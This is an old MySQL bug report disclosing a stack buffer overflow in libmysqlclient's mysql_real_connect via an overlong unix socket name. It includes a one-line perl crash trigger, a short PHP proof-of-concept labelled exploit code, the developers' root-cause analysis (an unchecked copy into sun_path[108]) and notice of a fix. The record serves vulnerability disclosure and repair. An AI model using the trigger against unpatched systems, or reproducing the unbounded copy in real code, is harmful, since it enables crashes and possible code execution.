Bug #564 mysql_real_connect buffer overflow in unix socket name.
Submitted: 1 Jun 2003 19:55 Modified: 4 Jun 2003 8:04
Reporter: pokleyzz sakamaniaka Email Updates:
Status: Closed Impact on me:
None 
Category:MySQL Server Severity:S2 (Serious)
Version:All OS:Any (All)
Assigned to: Jani Tolonen

[1 Jun 2003 19:55] pokleyzz sakamaniaka
Description:
We just found minor security bug in libmysqlclient. It is in mysql_real_connect 
function from libmysql.c . This bug can easily produce by supplying socket name > 250. It is stack base bufferoveflow where user can easily overwrite eip. 

ex:
 mysql -S `perl -e 'print "a" x 256'` -hlocalhost

This bug have succesfully test on safe_mode php (without command execution allow) in our latest geeklog bug (where user can upload *.php file)
http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0092.html

------exploit code -------------------
<?php
    for ($i;$i<256;$i++)
    	$buff .= "A";
    ini_set("mysql.default_socket","$buff");
    mysql_connect("localhost", "root", "1234")
    
?>
--------------------------------------

Regard,

pokleyzz@scan-associates.net
http://www.scan-associates.net

How to repeat:
i) mysql -S `perl -e 'print "a" x 256'` -hlocalhost

ii)
------exploit code -------------------
<?php
    for ($i;$i<256;$i++)
    	$buff .= "A";
    ini_set("mysql.default_socket","$buff");
    mysql_connect("localhost", "root", "1234")
    
?>
--------------------------------------
[4 Jun 2003 5:36] Lenz Grimmer
Jani, can you please have a look at this soon? Thanks!
[4 Jun 2003 5:43] Lenz Grimmer
BTW: I could not initally reproduce it with the provided Perl String (using 256 chars). I needed 322 chars 
to make it segfault in the standard 3.23.56 and 4.0.13 distribution.
[4 Jun 2003 6:17] Georg Richter
I think the problem is an buffer overflow in structure UNIX_addr:

-> strmov(UNIXaddr.sun_path, unix_socket);

sun_path is defined in sys/un.h:

/* Structure describing the address of an AF_LOCAL (aka AF_UNIX) socket.  */
struct sockaddr_un
  {
    __SOCKADDR_COMMON (sun_);
    char sun_path[108];		/* Path name.  */
  };

Georg
[4 Jun 2003 8:04] Jani Tolonen
Fixed. Will be in 4.0 and 4.1 soon.
Regards,
Jani
[17 Apr 2009 3:36] James Day
If you believe that you are vulnerable to this you should upgrade to 4.1 for a full fix, not stick to 4.0. You aren't vulnerable with any version if your server is running on Windows or any other platform that doesn't support unix-style sockets.